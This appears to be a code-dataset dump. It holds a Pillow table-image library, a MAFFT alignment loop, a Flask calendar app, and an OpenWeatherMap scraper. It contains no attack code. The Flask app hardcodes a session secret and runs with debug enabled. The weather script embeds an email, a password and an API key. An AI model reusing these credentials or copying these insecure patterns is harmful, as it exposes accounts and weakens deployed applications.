table_margin:int=20, pic_bk_color='#FFFFFF', table_line_color='#E8EAED', font_path:str=None):\n    \"\"\"\n    Generate the table picture.\n    :param row_num: int, number of rows in the table.\n    :param col_num: int, number of columns in the table.\n    :param title_list: list, set the title information. Multiple titles can be set, and the information for each title is stored in a dict. Example:\n        [{'content': 'I am the main title'}, {'content': 'I am the subtitle'}]\n        In this example, there are two titles. You can also specify the font size, color, alignment, and height for each title. For example:\n        [{'content': 'I am the main title', 'font_size': 40, 'color': '#000000', 'align': 'center', 'height': 100}, {'content': 'I am the subtitle', 'align':'right'}]\n        In this example, the main title has a custom font size, color, alignment, and height. The subtitle has a custom alignment.\n        'content' is a required key, other keys are optional. The default font size for the main title is 40, and 30 for the subtitle.\n        The default height for the main title is 80, and 60 for the subtitle. The color is black, and alignment is centered by default for all titles.\n    :param header_dict: dict, set the information for the table header.\n        Example 1: {'content': ['Header1', 'Header2', 'Header3']}\n        In this example, there are 3 headers for the table. This does not mean you must have exactly 3 columns, because you can combine multiple columns under one header.\n        The font size is 30, the background color is '#CCD6EB', the text color is black, and alignment is centered by default.\n\n        Example 2: {'content': ['Header1', 'Header2', 'Header3'], 'font_size': 35, 'bk_color': '#000000', 'fore_color': '#FFFFFF', 'align': 'left'}\n        In this example, the font size is 35, the background color is black, the text color is white, and the alignment is left-aligned.\n\n        If you like, you can specify a particular header's font size, background color, text color, and alignment. For example:\n        {'content': ['Header1', 'Header2', 'Header3'], 'bk_color': {0:'#FF0000',2:'#00FF00'}, 'fore_color': {1:'#0000FF'}, 'align': {1:'right'}}\n        It specifies that the first header's background color is red and the third header's background color is green. The other headers' background color is '#CCD6EB' by default.\n        The text color of the second header is blue, and other headers have a default text color of black. 
The alignment of the second header is right-aligned,\n        other headers have a default alignment of centered.\n    :param data_dict: dict, set the information for the data content of the table.\n        Example 1: {'content': [['A001', '123', '456'], ['A002', '234', '345']]}\n        The data part is specified by a two-dimensional list. The first dimension is the row, and the second dimension is the column. Note that each element\n        of the content must be a string, even if it represents a number.\n\n        Like the header_dict, you can also specify the font size, background color, text color and the alignment for each row, column, or even a single cell.\n        Example 2: {'content': [['A001', '123', '456'], ['A002', '234', '345']], 'bk_color': '#FFFFFF', 'fore_color': '#000000', 'align': 'right'}\n        It specifies that every data cell has a white background, black text, and right alignment.\n\n        Example 3: {'content': [['A001', '123', '456'], ['A002', '234', '345']], 'bk_color': {'r0': '#FFFF00'}, 'fore_color': {'c1':'#00FF00'}, 'align': {'2-3':'left'}}\n        It specifies that the first row's background color is yellow, the second column's text color is green, and the cell in the third row and fourth column\n        is left-aligned. 'r0' means the row with index 0, 'c2' the column with index 2, and '3-5' the cell located in the fourth row and sixth column.\n    :param img_path: Set the path for saving the image. If None, the image will not be saved.\n    :param footnote_list: list, optional parameter. Set the footnote information. The structure is the same as title_list. The default alignment\n        is right-aligned, the font size is 30, and the height is 60 by default.\n    :param cell_width: int, optional parameter. Set the width of each cell. The default is 150.\n    :param cell_height: int, optional parameter. Set the height of each cell. The default is 50.\n    :param col_width_dict: dict, specify the width of individual columns. For example, {0: 200} specifies the width of the first column as 200.\n        Other columns use the width specified by the parameter cell_width.\n\n    :param row_height_dict: dict, specify the height of individual rows. For example, {1: 80} specifies the height of the second row as 80.\n        Other rows use the height specified by the parameter cell_height.\n\n    :param cell_merge_dict: dict, contains the information on merging cells. For example, {'0-0': [1,0], '0-1': [0, 2]} indicates that the cell at coordinate [0,0] needs to be merged,\n        by merging 1 row downward and 0 columns to the right (i.e., not merging columns); the cell at coordinate [0,1] needs to be merged, by merging\n        0 rows downward and 2 columns to the right.\n    :param pic_bk_color: str, optional parameter. Set the background color of the picture, default value is '#FFFFFF'.\n    :param table_line_color: str, optional parameter. Set the line color of the table, default value is '#E8EAED'.\n    :param font_path: str, optional parameter. 
Given the font path to set a new font for the text (including title, header, data).\n \"\"\"\n # Define default values\n __default_title_font_size = 40\n __default_footnote_font_size = 30\n __default_header_font_size = 30\n __default_data_font_size = 20\n __default_title_height = 80\n __default_footnote_height = 60\n __default_header_bk_color = '#CCD6EB'\n __default_title_color = '#000000'\n __default_footnote_color = '#000000'\n __default_title_align = 'center'\n __default_footnote_align = 'right'\n\n # Calculate the width for each column and the height for each row\n calc_col_width_dict, calc_row_height_dict = __calculate_data_cell_width_height(row_num, data_dict, font_path, cell_width, cell_height)\n calc_col_width_dict.update(col_width_dict)\n calc_row_height_dict.update(row_height_dict)\n\n color_white = '#FFFFFF'\n color_black = '#000000'\n\n title_list = __process_title_footnote(title_list, __default_title_align, __default_title_font_size, __default_title_height, __default_title_color)\n footnote_list = __process_title_footnote(footnote_list, __default_footnote_align, __default_footnote_font_size, __default_footnote_height, __default_footnote_color)\n total_title_height = sum([title['height'] for title in title_list])\n total_footnote_height = sum([footnote['height'] for footnote in footnote_list])\n max_title_footnote_width = __get_max_width_title_footnote(title_list, footnote_list, font_path)\n cell_pos_list, table_pos = generate_table_rec_coord(row_num, col_num, start_pos=[table_margin, total_title_height], cell_width=cell_width, cell_height=cell_height,\n col_width_dict=calc_col_width_dict, row_height_dict=calc_row_height_dict, cell_merge_dict=cell_merge_dict,)\n\n # if the title is longer the table, need to adjust the table pos.\n if table_pos[2] < max_title_footnote_width:\n # print(table_pos, max_title_footnote_width)\n diff = (max_title_footnote_width - table_pos[2]) // 2 + 5\n # print(diff)\n new_cell_pos_list = []\n # update the cell rectangle coordinates(only for x axis).\n for rec_pos in cell_pos_list:\n new_cell_pos_list.append([x+diff if idx % 2 == 0 else x for idx, x in enumerate(rec_pos)])\n # update the total table pos\n new_table_pos = [x+diff if idx % 2 == 0 else x for idx, x in enumerate(table_pos)]\n # print(new_table_pos)\n cell_pos_list = new_cell_pos_list\n table_pos = new_table_pos\n\n\n pic_width = max(table_pos[2], max_title_footnote_width) + table_margin\n pic_height = table_pos[3] + table_margin + total_footnote_height\n\n image = Image.new('RGB', (pic_width, pic_height), pic_bk_color)\n draw = ImageDraw.Draw(image)\n draw.rectangle(table_pos, fill=table_line_color)\n\n # Draw Title\n tp_dict = {}\n for idx, title in enumerate(title_list):\n title_rec_coord = [0, tp_dict.get(idx-1, 0), pic_width, title['height'] + tp_dict.get(idx-1, 0)]\n tp_dict[idx] = title_rec_coord[3]\n title_font = get_font(font_path, title['font_size'])\n title_coord = get_content_pos(title_rec_coord, title['content'], title_font, title['align'])\n draw.text(title_coord, title['content'], font=title_font, fill=title['color'])\n\n # Draw Header\n for idx, header_content in enumerate(header_dict['content']):\n header_rec_pos = cell_pos_list[idx]\n header_font = get_font(font_path, header_dict.get('font_size', __default_header_font_size)) \\\n if type(header_dict.get('font_size', __default_header_font_size)) == int \\\n else get_font(font_path, header_dict['font_size'].get(idx, __default_header_font_size))\n header_coord = get_content_pos(header_rec_pos, header_content, header_font, 
header_dict.get('align', 'center')) \\\n if type(header_dict.get('align', 'center')) == str \\\n else get_content_pos(header_rec_pos, header_content, header_font, header_dict['align'].get(idx, 'center'))\n draw.rectangle(header_rec_pos, fill=header_dict.get('bk_color', __default_header_bk_color)) \\\n if type(header_dict.get('bk_color', __default_header_bk_color)) == str \\\n else draw.rectangle(header_rec_pos, fill=header_dict['bk_color'].get(idx, __default_header_bk_color))\n header_fore_color = header_dict.get('fore_color', color_black) \\\n if type(header_dict.get('fore_color', color_black)) == str \\\n else header_dict['fore_color'].get(idx, color_black)\n draw.text(header_coord, header_content, font=header_font, fill=header_fore_color)\n\n # Draw Data\n # idx keeps its final value from the header loop (the last header column),\n # so the data cells start right after the header row in cell_pos_list\n for i, data_line in enumerate(data_dict['content']):\n for j, data_content in enumerate(data_line):\n data_rec_coord = cell_pos_list[idx + 1 + (i * col_num) + j]\n data_rec_bk_color = __get_data_info(data_dict, 'bk_color', i, j, color_white, str)\n draw.rectangle(data_rec_coord, fill=data_rec_bk_color)\n data_font = get_font(font_path, __get_data_info(data_dict, 'font_size', i, j, __default_data_font_size, int))\n data_coord = get_content_pos(data_rec_coord, data_content, data_font, __get_data_info(data_dict, 'align', i, j, 'center', str))\n draw.text(data_coord, data_content, font=data_font, fill=__get_data_info(data_dict, 'fore_color', i, j, color_black, str))\n\n # Draw footnote\n tp_dict = {-1: table_pos[3] + table_margin}\n for idx, footnote in enumerate(footnote_list):\n footnote_rec_coord = [0, tp_dict[idx-1], pic_width, footnote['height'] + tp_dict[idx-1]]\n tp_dict[idx] = footnote_rec_coord[3]\n footnote_font = get_font(font_path, footnote['font_size'])\n footnote_coord = get_content_pos(footnote_rec_coord, footnote['content'], footnote_font, footnote['align'])\n draw.text(footnote_coord, footnote['content'], font=footnote_font, fill=footnote['color'])\n if img_path:\n image.save(img_path)\n else:\n return image\n\n\ndef combine_multiple_pic(combine_path:str, path_list:list=None, img_list:list=None, pic_bk_color:str='#FFFFFF'):\n \"\"\"\n Combine multiple pictures vertically into one\n :param combine_path: str, the path where the combined picture is saved\n :param path_list: list, the paths of the pictures to combine\n :param img_list: list, already-opened PIL images to combine (used when path_list is None)\n :param pic_bk_color: str, the background color of the combined picture\n \"\"\"\n total_width = 0\n total_height = 0\n if path_list is None and img_list is None:\n raise ValueError('Please specify the path_list or img_list!')\n elif path_list:\n img_list = []\n for path in path_list:\n img = Image.open(path)\n img_list.append(img)\n total_width = max(total_width, img.width)\n total_height += img.height\n elif img_list:\n total_width = max([img.width for img in img_list])\n total_height = sum([img.height for img in img_list])\n\n combine_img = Image.new('RGB', (total_width, total_height), pic_bk_color)\n start_height = 0\n for img in img_list:\n combine_img.paste(img, ((total_width-img.width)//2, start_height))\n start_height += img.height\n combine_img.save(combine_path)\n\n\n\n\n","repo_name":"slash-xin/tablepic","sub_path":"src/tablepic/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":20398,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"1905288470","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Apr 1 22:01:49 2018\n\n@author: Jiaqi Li\n\"\"\"\n\nimport numpy\nfrom scipy import *\nimport Bio\nfrom Bio.Align.Applications import MafftCommandline\n\na = linspace(1,100,100)\n\ni = 0\nwhile i < 100:\n print('Now running 
sample%d' %(a[i]))\n mafft_exe = \"D:\\\\MAFFT\\\\mafft-7.380-win64-signed\\\\mafft-win\\\\mafft.bat\"\n in_file = \"D:\\\\Research\\\\100_samples\\\\100_samples\\\\sample_shuffle_again%d.txt\" %(a[i])\n mafft_cline = MafftCommandline(mafft_exe, input=in_file)\n print(mafft_cline)\n stdout, stderr = mafft_cline()\n with open(\"aligned_sample_shuffled%d.fasta\" %(a[i]), \"w\") as handle:\n handle.write(stdout)\n from Bio import AlignIO\n align = AlignIO.read(\"aligned_sample_shuffled%d.fasta\" %(a[i]), \"fasta\")\n i += 1","repo_name":"JohnnyBarber/Phylogenetic-Research-Project","sub_path":"mafft_python_encoding.py","file_name":"mafft_python_encoding.py","file_ext":"py","file_size_in_byte":776,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"4034229784","text":"\"\"\"\ncalendarize Flask application file\n\nThe code for this project loosely follows PEP 8 style guidelines.\nYou can read about them here: https://www.python.org/dev/peps/pep-0008/\nAny code that does not comply will be modified to do so if possible.\nIf you're using PyCharm, it will have built-in PEP8 linting,\nand similar packages should be available for other editors.\n\nLinks to documentation for the packages used can be found\nin the GitHub repository README.md\n\n\"\"\"\nimport logging\nimport json, string, re, random\nimport pytz\n# from pytz import timezone\nfrom datetime import datetime, date\nfrom classes import db_queries as db\nfrom flask import Flask, flash, render_template, session, g, request, url_for, redirect, safe_join\nfrom flask_mobility import Mobility\nfrom flask_mobility.decorators import mobile_template\nfrom classes.user import User\nfrom flask_login import *\nfrom flask_login import login_user, current_user\nfrom funcs.logIn import check_password, hash_password\nfrom funcs.logIn import login_func\nfrom funcs import file_tools\nfrom flask_mail import Mail, Message\nfrom funcs.file_tools import load_file\nfrom funcs.send_email import *\nfrom funcs.reset import *\n\n# app initialization\napp = Flask(__name__)\nMobility(app)\n\n# config setup\napp.config['DEBUG'] = True # Testing only\n\n# needed for session cookies\napp.secret_key = 'hella secret'\nmail = Mail(app)\n\n# initialization of login manager\n# it keeps the given user logged in via use of cookies\nlogin_manager = LoginManager()\nlogin_manager.init_app(app)\nlogin_manager.login_view = '/'\n\n# stores returned user into current session\n@login_manager.user_loader\ndef load_user(email):\n \"\"\"Returns an object of class User based on provided unique identifier\n if user in the database, otherwise None\n \"\"\"\n if user_exists(email):\n return User(email)\n return None\n\n\ndef setup_logging():\n \"\"\"\n \"\"\"\n try:\n lg = logging.getLogger(__name__)\n lg.setLevel(logging.INFO)\n handler = logging.FileHandler(filename='calendarize.log', encoding='utf-8', mode='a')\n fmt = logging.Formatter('[%(asctime)s]:%(module)s:%(levelname)s: %(message)s', datefmt='%H:%M:%S')\n handler.setFormatter(fmt)\n lg.addHandler(handler)\n return lg\n except PermissionError as e:\n print('{}\\n'\n 'WARNING: Logging not enabled.\\n'\n 'If you get this error, change your IDE working directory.\\n'\n 'The application will still work, but nothing will be logged.'.format(e))\n # In PyCharm, go to Run>Edit Configuration to set the working directory to the calendarize folder.\n\n\ndef end_logging(log):\n \"\"\"\n \"\"\"\n handlers = log.handlers[:]\n for hdlr in handlers:\n hdlr.close()\n 
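        # Close the stream first so buffered records are flushed to disk, then\n        # detach the handler so a later setup_logging() call does not write\n        # duplicate lines through stale handlers.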
log.removeHandler(hdlr)\n\n\nlogger = setup_logging()\n\n\n@app.before_request\ndef prequest():\n log_basic()\n\n\ndef request_data(req):\n \"\"\"\n \"\"\"\n res = '{} requested by {}'.format(req.url, req.remote_addr)\n return res\n\n\ndef log_basic():\n \"\"\"\n \"\"\"\n # This handles logging of basic data that should be logged for all requests\n if logger:\n logger.info(request_data(request))\n\n\n# It should be moved to a separate file if there\n# ends up being more functions like this one\ndef user_exists(email):\n \"\"\"Returnes True if user with provided identifier exists,\n otherwise False\n \"\"\"\n with db.ConnectionInstance() as queries:\n if queries.get_user_id(email) is None:\n return False\n return True\n\n\n\n##################################################################\n\n# Some of the routes below might warrant moving out and\n# into separate files, but until the scope of the operations\n# that need to be performed are clear, they stay here\n# as a skeleton for easy reference.\n# #################################################################\n\n@app.route('/')\n@mobile_template('/{mobile/}index.html')\ndef index(template):\n \"\"\"\n \"\"\"\n# from classes.dummy_classes import ShardTestingClass\n# for i in range(0, 5):\n# with ShardTestingClass(app) as st:\n# print(app.config['shards'])\n# st.work()\n# print(app.config['shards'])\n if (current_user.is_authenticated):\n return redirect('/index_user')\n return render_template(template)\n\n\n@app.route('/index_user')\n@mobile_template('/{mobile/}index_user.html')\n@login_required\ndef index_user(template):\n \"\"\"\n \"\"\"\n# from classes.dummy_classes import ShardTestingClass\n# for i in range(0, 5):\n# with ShardTestingClass(app) as st:\n# print(app.config['shards'])\n# st.work()\n# print(app.config['shards'])\n displayed_name = current_user.name if current_user.name else current_user.email\n return render_template(template, name=displayed_name)\n\n\n@app.route('/user_availability', methods=['GET', 'POST'])\ndef user_availability():\n \"\"\"\n \"\"\"\n if request.method == \"POST\":\n email = request.form['inputEmail']\n if email and user_exists(email):\n return 'false'\n return 'true'\n return redirect('/')\n\n\n@app.route('/register', methods=['GET', 'POST'])\ndef register():\n \"\"\"\n \"\"\"\n if request.method == \"POST\":\n # read the posted values from the UI\n email = request.form.get('inputEmail', None)\n password = request.form.get('inputPassword', None)\n # validate received values\n if email and password and not user_exists(email):\n with db.ConnectionInstance() as queries:\n key = random_key(10) + email[:5]\n # TODO delete or merge previously created user if exists\n #adds new user to the database\n added = queries.add_user(datetime.utcnow(), email, hash_password(password),key)\n if (added):\n user = User(email)\n #adds default calendar to that user\n queries.add_calendar(datetime.utcnow(), user.user_id)\n #send verfication email\n send_verification(email,key)\n return render_template(\"verify_send.html\", email=email)\n # reload if something not right\n # TODO maybe some error messages\n return redirect('/')\n\n\n@app.route('/verify_credentials', methods=['GET', 'POST'])\ndef verify_credentials():\n \"\"\"\n \"\"\"\n if request.method == \"POST\":\n email = request.form['inputEmail']\n password = request.form[\"inputPassword\"]\n if email and user_exists(email) and check_password(password, email):\n return 'true'\n return 'false'\n return redirect('/')\n\n\n@app.route(\"/login\", methods=['GET', 
'POST'])\ndef login():\n \"\"\"\n \"\"\"\n if request.method == \"POST\":\n password = request.form[\"inputPassword\"]\n email = request.form[\"inputEmail\"]\n user = load_user(email)\n if user is not None:\n if not user.is_active():\n return render_template(\"verify_option.html\", email=email)\n if check_password(password, email) and user.is_active():\n if 'remember' in request.form and request.form[\"remember\"] == 'on':\n remember_me = True\n else:\n remember_me = False\n login_user(user, remember=remember_me)\n return redirect('/index_user')\n return redirect('/')\n\n\n@app.route(\"/logout\")\n@login_required\ndef logout():\n \"\"\" Logs the user out and redirects to the main page\n \"\"\"\n logout_user()\n # TODO redirect to: you have been successfully logged out\n return redirect('/')\n\n\n@app.route(\"/recover/\", methods=[\"GET\", \"POST\"])\ndef recover():\n if request.method == \"POST\":\n email = request.form.get(\"email\", None)\n if not email:\n flash(\"You need to fill out an email!\")\n return redirect(url_for('recover'))\n if user_exists(email):\n send_recover(email)\n return render_template(\"recoverconfirm.html\", email=email)\n else:\n return render_template(\"recoverconfirm.html\", email=email)\n return render_template(\"recover.html\")\n\n\n@app.route(\"/reset/<resetkey>\", methods=[\"GET\", \"POST\"])\ndef reset(resetkey):\n with db.ConnectionInstance() as queries:\n email = queries.get_reset_info(resetkey)\n if email:\n if request.method == \"POST\":\n if reset_password(email):\n return render_template(\"resetsuccess.html\")\n return render_template(\"reset.html\")\n else:\n return render_template(\"invalidlink.html\")\n\n@app.route('/calendar')\n@mobile_template('/{mobile/}calendar.html')\n@login_required\ndef calendar(template):\n \"\"\"\n \"\"\"\n log_basic()\n with db.ConnectionInstance() as queries:\n invites = queries.get_user_invites(current_user.user_id)\n invites = len(invites) if invites else 0\n displayed_name = current_user.email if current_user.name is None else current_user.name\n return render_template(template, name=displayed_name, notifier=invites)\n\n\n@app.route('/side/<path>')\n@login_required\ndef load_sidebar(path):\n safe_path = safe_join('sidebar', path + '.html')\n log_basic()\n if path == 'notifications':\n with db.ConnectionInstance() as queries:\n invites = queries.get_user_invites(current_user.user_id)\n return render_template(safe_path, notifications=invites)\n if path == 'display_profile':\n with db.ConnectionInstance() as queries:\n phone = queries.get_user_data(current_user.user_id)\n name = current_user.name if current_user.name else current_user.email\n return render_template(safe_path, name=name, email=current_user.email, phone=phone)\n return render_template(safe_path)\n\n\n@app.route('/get_data')\n@login_required\ndef get_data():\n \"\"\"\n \"\"\"\n with db.ConnectionInstance() as queries:\n calendar_ids = queries.get_calendars(current_user.user_id)\n cal_details = queries.get_calendars_details(calendar_ids)\n event_details = queries.get_events_details(calendar_ids)\n return json.dumps([cal_details, event_details], default=type_handler)\n\n\n# helper function, should be moved\ndef type_handler(x):\n if isinstance(x, (date, datetime)):\n x = pytz.utc.localize(x)\n # TODO if desired timezone set use this line:\n # x = x.astimezone(tz)\n return x.isoformat()\n elif isinstance(x, bytearray):\n return x.decode('utf-8')\n raise TypeError(\"Unknown type\")\n\n\n@app.route('/uploads/<filename>')\n@login_required\ndef uploaded_file(filename):\n eid = request.args.get('id')\n 
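    # Only users holding some role on the event's calendar may download its\n    # attachments; any other request falls through and implicitly returns None.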
with db.ConnectionInstance() as queries:\n cal = queries.get_event_calendar_id(eid)\n role = queries.get_calendar_role(current_user.user_id, cal)\n if role is not None:\n return load_file(filename, eid)\n # return redirect(url_for('error'))\n\n\n@app.route('/add_calendar', methods=['POST', 'GET'])\n@login_required\ndef add_calendar():\n if request.method == \"POST\":\n cal_name = request.form.get('newCalendarName', None)\n cal_color = request.form.get('color', None)\n if cal_name and cal_color and len(cal_name) < 45 and len(cal_color) == 7:\n with db.ConnectionInstance() as queries:\n new_cal_id = queries.add_calendar(datetime.utcnow(), current_user.user_id, cal_name, cal_color[1:])\n if new_cal_id:\n # parse 'invites' string and send invites\n invites = re.sub( '\\s+', ' ', request.form.get('invites', '')).strip()\n invites = re.split(',| |;', invites)\n for email in invites:\n if '@' in email and queries.check_invite(email, new_cal_id):\n role = 3 # 0: owner, 1: admin, 2: contributor, 3: user\n queries.send_invite(new_cal_id, queries.get_user_id(email), current_user.user_id, role,email)\n sender = current_user.name if current_user.name else current_user.email\n # send email to email\n send_invite(sender,email,cal_name)\n return 'true'\n return 'false'\n\n\n@app.route('/request_calandar', methods=['POST', 'GET'])\n@login_required\ndef request_calandar():\n if request.method == \"POST\":\n cal_id = request.form.get('cal_id', None)\n if cal_id:\n with db.ConnectionInstance() as queries:\n role = queries.get_calendar_role(current_user.user_id, cal_id)\n if role is not None:\n cal_data = queries.get_calendars_details((cal_id,))[0]\n return json.dumps({'success' : 'true', 'data' : json.dumps(cal_data, default=type_handler)})\n return json.dumps({'success' : 'false'})\n\n\n@app.route('/join_calander', methods=['POST', 'GET'])\n@login_required\ndef join_calander():\n if request.method == 'POST':\n id = request.form.get(\"calendar_id\", None)\n role = request.form.get(\"role\", None)\n with db.ConnectionInstance() as q:\n if q.check_for_invite(current_user.user_id, id, role) == True:\n q.join_calander(id, current_user.user_id, role)\n return 'true'\n return 'false'\n\n\n@app.route('/decline_calander', methods=['POST', 'GET'])\n@login_required\ndef decline_calander():\n if request.method == 'POST':\n id = request.form.get(\"calendar_id\", None)\n role = request.form.get(\"role\", None)\n with db.ConnectionInstance() as q:\n if q.check_for_invite(current_user.user_id, id, role) == True:\n return 'true'\n return 'false'\n\n\n@app.route('/invite_calendar', methods=['POST', 'GET'])\n@login_required\ndef invite_calander():\n if request.method == 'POST':\n email = request.form.get(\"email\", None)\n if len(email) > 45:\n return 'false'\n calendar_id = request.form.get(\"calendar_id\", None)\n role = request.form.get(\"role\", None)\n with db.ConnectionInstance() as q:\n if q.get_calendar_role(current_user.user_id, calendar_id) == 0 and q.check_invite(email, calendar_id):\n q.send_invite(calendar_id, q.get_user_id(email), current_user.user_id, role, email)\n return 'true'\n return 'false'\n\n\n@app.route('/leave_calander', methods=['POST', 'GET'])\n@login_required\ndef leave_calander():\n if request.method == 'POST':\n id = request.form.get(\"calender_id\", None)\n with db.ConnectionInstance() as q:\n q.leave_calander(id, current_user.user_id)\n return 'true'\n return 'false'\n\n\n@app.route('/add_event', methods=['POST', 'GET'])\n@login_required\ndef add_event():\n if request.method == \"POST\":\n data 
= request.form.to_dict()\n print(data)\n if 'newEventName' in data and 'calendarID' in data:\n # the client sends dates as JavaScript timestamps in milliseconds,\n # so divide by 1000 before handing them to utcfromtimestamp\n try:\n data['startDate'] = datetime.utcfromtimestamp(int(data['startDate'])/1000.0)\n except Exception:\n return json.dumps({'success' : 'false', 'message': 'date'})\n try:\n data['endDate'] = datetime.utcfromtimestamp(int(data['endDate'])/1000.0)\n if data['endDate'] < data['startDate']:\n data['endDate'] = data['startDate']\n except Exception:\n data['endDate'] = data['startDate']\n with db.ConnectionInstance() as queries:\n role = queries.get_calendar_role(current_user.user_id, data['calendarID'])\n if role is not None and role == 0:\n eid = queries.add_event(data, datetime.utcnow(), current_user.user_id)\n if eid:\n success = [queries.add_file(file, eid) for file in request.files.getlist('file')]\n return json.dumps({'success' : 'true', 'id': eid, 'files': success})\n return json.dumps({'success' : 'false'})\n\n\n@app.route('/add_files', methods=['POST'])\n@login_required\ndef add_files():\n with db.ConnectionInstance() as q:\n for file in request.files:\n success = q.add_file(request.files[file], request.form['event_id'])\n if not success:\n # TODO handle what happens if the file fails to upload\n pass\n return 'true'\n\n\n@app.route('/update_profile', methods=['POST'])\n@login_required\ndef update_profile():\n log_basic()\n if request.method == \"POST\":\n name = request.form.get('name', None)\n name = current_user.name if name == '' or name is None else name\n try:\n phone = int(request.form['phone'])\n except Exception:\n phone = None\n if name and len(name) < 45:\n with db.ConnectionInstance() as queries:\n if queries.update_user(current_user.user_id, name, phone):\n return 'true'\n return 'false'\n\n\n##################################################################\n# DELETION FUNCTIONS - emphasized because it would be bad if these\n# did not work properly. 
Make sure to test them properly.\n# TODO remove emphasis only after these functions are tested\n# TODO errors and error handling\n\n\n@app.route('/delete_user')\n@fresh_login_required\ndef delete_user():\n with db.ConnectionInstance() as queries:\n queries.db_del_user(current_user.user_id)\n logout_user()\n # TODO redirect to user has been deleted page\n return redirect(url_for('index'))\n\n\n@app.route('/delete_event', methods=['POST', 'GET'])\n@fresh_login_required\ndef delete_event():\n if request.method == \"POST\":\n event = request.form.get('event_id', None)\n if event:\n with db.ConnectionInstance() as queries:\n cal = queries.get_event_calendar_id(event)\n role = queries.get_calendar_role(current_user.user_id, cal)\n if role is not None and role == 0:\n queries.db_del_event(event)\n # TODO delete files\n # TODO delete children\n return 'true'\n return 'false'\n\n\n@app.route('/delete_calendar', methods=['POST', 'GET'])\n@fresh_login_required\ndef delete_cal():\n if request.method == \"POST\":\n cal = request.form.get('calendar_id', None)\n if cal:\n with db.ConnectionInstance() as queries:\n role = queries.get_calendar_role(current_user.user_id, cal)\n if role is not None and role == 0:\n queries.db_del_cal(cal)\n return 'true'\n return 'false'\n\n\n@app.route(\"/verify/<verify_key>\", methods=[\"GET\", \"POST\"])\ndef verify(verify_key):\n with db.ConnectionInstance() as queries:\n email = queries.get_verify_info(verify_key)\n if email:\n with db.ConnectionInstance() as queries:\n queries.activate_user(email)\n user = load_user(email)\n login_user(user)\n return render_template(\"verify_confirm.html\")\n else:\n return (\"Your account has already been verified or the link has expired\")\n\n\n@app.route(\"/verifyoption\", methods=[\"GET\", \"POST\"])\ndef verifyoption():\n email = request.form.get(\"email\", None)\n user = load_user(email)\n if email:\n key = random_key(10) + email[:5]\n with db.ConnectionInstance() as queries:\n queries.make_verifykey(user.user_id, key)\n send_verification(email, key)\n return render_template(\"verify_send.html\", email=email)\n\n\ndef start():\n app.run()\n\n@app.route(\"/verifytesting\")\ndef vtest():\n return render_template(\"verify.html\", email='thisisemail')\n\n\n\n##################################################################\n\n\nif __name__ == '__main__':\n start()\n","repo_name":"dat210a/calendarize","sub_path":"app/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":19623,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"30342868346","text":"from grab import Grab\r\nfrom lxml import html\r\nimport urllib.request\r\nimport gzip\r\nimport json\r\nimport sqlite3\r\nimport os\r\nimport datetime\r\n\r\nusername = 'ostrowsky'\r\nemail = 'ostrowskyi@gmail.com'\r\npassword = password_confirmation = 'want_to_get_weather'\r\n\r\n'''\r\ng = Grab()\r\ng.go('https://home.openweathermap.org/users/sign_up')\r\ng.set_input_by_id('user_username', username)\r\ng.set_input_by_id('user_email', email)\r\ng.set_input_by_id('user_password', password)\r\ng.set_input_by_id('user_password_confirmation', password_confirmation)\r\ng.set_input_by_id('user_agreement', 'True')\r\ng.submit()\r\nprint(g.response, g.response.body)\r\n\r\ng = Grab()\r\ng.go('https://home.openweathermap.org/api_keys')\r\ng.set_input_by_id('user_email', email)\r\ng.set_input_by_id('user_password', password)\r\ng.set_input_by_id('user_remember_me', 'True')\r\ng.submit()\r\napp_id = 
g.xpath_text('/html/body/div[3]/div[5]/div[3]/div[1]/table/tbody/tr/td[1]/pre')\r\nwith open('app.id', 'w', encoding='UTF-8') as f:\r\n f.write(app_id)\r\n\r\n\r\nf = urllib.request.urlopen('http://bulk.openweathermap.org/sample/city.list.json.gz')\r\ns = f.read()\r\nwith open('city.list.json.gz', 'wb') as arch:\r\n arch.write(s)\r\n\r\nwith gzip.open('city.list.json.gz', 'r') as arch:\r\n archive_content = arch.read()\r\n\r\n\r\nwith open('city.list.json', 'wb') as json_content:\r\n json_content.write(archive_content)\r\n'''\r\n\r\nwith open('app.id', 'r', encoding='UTF-8') as f:\r\n app_id = f.read()\r\n\r\ndb_filename = 'db_weather'\r\nconn = sqlite3.connect(db_filename)\r\nconn.close()\r\n#os.remove(db_filename)\r\n\"\"\"\r\nwith sqlite3.connect(db_filename) as conn:\r\n conn.execute('''\r\n create table weather (\r\n id_города INTEGER PRIMARY KEY,\r\n Город VARCHAR(255),\r\n Дата DATE,\r\n Температура INTEGER,\r\n id_погоды INTEGER\r\n );\r\n ''')\r\n\"\"\"\r\n\r\nwith open('city.list.json', 'rb') as json_file:\r\n # each line of city.list.json holds one JSON record for a single city\r\n for line in json_file:\r\n decoded_line = line.decode('utf-8')\r\n city = json.loads(decoded_line)\r\n city_id = city['_id']\r\n name = city['name']\r\n print(city['country'])\r\n date = datetime.date.today()\r\n query = 'http://api.openweathermap.org/data/2.5/weather?id={}&units=metric&appid={}'.format(city['_id'], app_id)\r\n request = urllib.request.urlopen(query)\r\n response = request.read()\r\n response_decoded = response.decode('utf-8')\r\n json_line = json.loads(response_decoded)\r\n temp = json_line['main']['temp']\r\n temp_id = json_line['weather'][0]['id']\r\n\r\n \"\"\"\r\n with sqlite3.connect(db_filename) as conn:\r\n conn.execute('''\r\n insert into weather (id_города, Город, Дата, Температура, id_погоды) VALUES (?,?,?,?,?)''', (\r\n city_id, name, date, temp, temp_id\r\n )\r\n )\r\n\r\n \"\"\"\r\n\r\n\r\n\r\n # g = Grab()\r\n # g.go('http://api.openweathermap.org/data/2.5/weather?id=524901&units=metric&appid=5ed63d7796f30a5f84cf735eed9af7e1')\r\n #print(g.response, g.response.body)\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"ostrowsky/Parcer","sub_path":"Py8/Py8.py","file_name":"Py8.py","file_ext":"py","file_size_in_byte":3153,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"20043377609","text":"#!/usr/bin/python\r\n# encoding:utf-8\r\n\r\nimport time\r\nfrom selenium.webdriver.common.by import By\r\nfrom base.baseOperate import Commom as 